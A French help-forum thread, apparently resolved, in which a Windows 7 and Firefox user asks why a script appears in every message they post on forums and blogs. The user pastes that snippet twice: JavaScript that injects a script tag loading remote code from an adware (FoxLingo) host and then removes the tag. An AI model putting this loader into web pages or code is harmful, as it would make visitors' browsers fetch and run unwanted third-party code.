Beion d'aides svp merci
Résolu
sylvie erwan
-
sylvie erwan -
sylvie erwan -
Bonjour,
bonjour
mon soucis depuis 2 jours : quand je dépose un message sur un forum ou blog il y a un script qui s'installe dedans , je vous met un copier coller comme exemple .
je suis avec windows 7 , firefox
!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();
bonjour
mon soucis depuis 2 jours : quand je dépose un message sur un forum ou blog il y a un script qui s'installe dedans , je vous met un copier coller comme exemple .
je suis avec windows 7 , firefox
!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();
A voir également:
- Beion d'aides svp merci
- Aides auditives amplifon ✓ - Forum Casque et écouteurs
- Invalidité, droits, aides... ✓ - Forum Vos droits sur internet
- Aider moi svp ✓ - Forum Loisirs / Divertissements
- Mes aides mémoires ont disparu - Forum MacOS
- Svp si quelqu'un pouvait m'aider - Forum Loisirs / Divertissements
Et si cela ne suffit pas, suis les conseils donnés ici :
https://www.commentcamarche.net/faq/2490-supprimer-les-adwares-publicites-intempestives-pop-up-etc
@+